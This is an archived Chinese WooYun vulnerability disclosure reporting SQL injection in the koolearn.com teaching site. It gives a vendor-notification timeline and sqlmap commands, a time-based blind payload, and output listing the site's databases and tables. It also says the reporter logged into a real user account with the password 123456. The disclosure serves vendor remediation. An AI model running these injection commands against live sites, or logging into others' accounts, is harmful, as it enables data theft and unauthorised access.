乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-04: 细节已通知厂商并且等待厂商处理中 2015-12-05: 厂商已经确认,细节仅向厂商公开 2015-12-15: 细节向核心白帽子及相关领域专家公开 2015-12-25: 细节向普通白帽子公开 2016-01-04: 细节向实习白帽子公开 2016-01-19: 细节向公众公开
全站式就是到处都是注入
地址 http://tb.koolearn.com/ 登录框处
sqlmap -u "http://tb.koolearn.com/index/lsub?username=a&password=s&checkbox=0"
Parameter: username (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: username=a' AND (SELECT * FROM (SELECT(SLEEP(5)))sMNR) AND 'cOLF'='cOLF&password=s&checkbox=0---[23:36:47] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.5.12back-end DBMS: MySQL 5.0.12
available databases [3]:[*] information_schema[*] tbl[*] testDatabase: tbl+--------------------------+---------+| Table | Entries |+--------------------------+---------+| tbl_transaction | 273227 || tbl_remind_push | 71005 || tbl_user_study | 60076 || tbl_course | 57141 || tbl_review | 26566 || tbl_stulist | 22945 || tbl_code | 22510 || tbl_study | 14302 || tbl_user | 14280 || zxzbcar_push | 12867 || tbl_message | 10300 || tbl_classlist | 5154 || tbl_user_dream | 5105 || tbl_answers | 3214 || tbl_title | 3064 || tbl_review_unlock | 1757 || tbl_class_resource | 1750 || tbl_bind | 1112 || tbl_teacher_point | 985 || tbl_finance | 879 || tbl_english_answers | 877 || tbl_english_record | 810 || tbl_finance_wj | 776 || tbl_upaudiofile | 774 || tbl_admin_class | 554 || tbl_efficiency | 517 || tbl_knowledge | 416 || admin_roles | 410 || tbl_english_upaudiofile | 398 || tbl_admin | 380 || tbl_finance_drop | 371 || tbl_english_title | 272 || tbl_messagetext | 245 || tbl_composition | 209 || tbl_coin_log | 194 || tbl_push | 142 || tbl_knowledge_msg | 73 || tbl_advice | 65 || tbl_menu | 65 || tbl_morn_read | 52 || tbl_schoollist | 50 || goolen3 | 48 || tbl_english_scene | 32 || tbl_province | 31 || tbl_english_mate | 29 || tbl_buffey_column_video | 22 || tbl_coins | 21 || tbl_buffey_column_review | 13 || tbl_english_resource | 13 || tbl_resources | 9 || tbl_buffey_column_name | 8 || tbl_bind_vir | 4 || tbl_roles | 3 || tbl_roles_ctrl | 3 || tbl_advice_reply | 1 || tbl_sign | 1 || tbl_version | 1 |+--------------------------+---------+
大多数密码都是 123456,随便登录一个
[email protected] 密码123456
靓!存在多个注入点
sqlmap -u "http://tb.koolearn.com/teachmanage/intoclass/classid/3728*/resource_id/33201*/unit_id/166251*" --cookie="填上cookie"参数 classid,resource_id,unit_id均可注入
过滤
危害等级:高
漏洞Rank:18
确认时间:2015-12-05 00:44
谢谢漏洞提供,我们会尽快处理!
暂无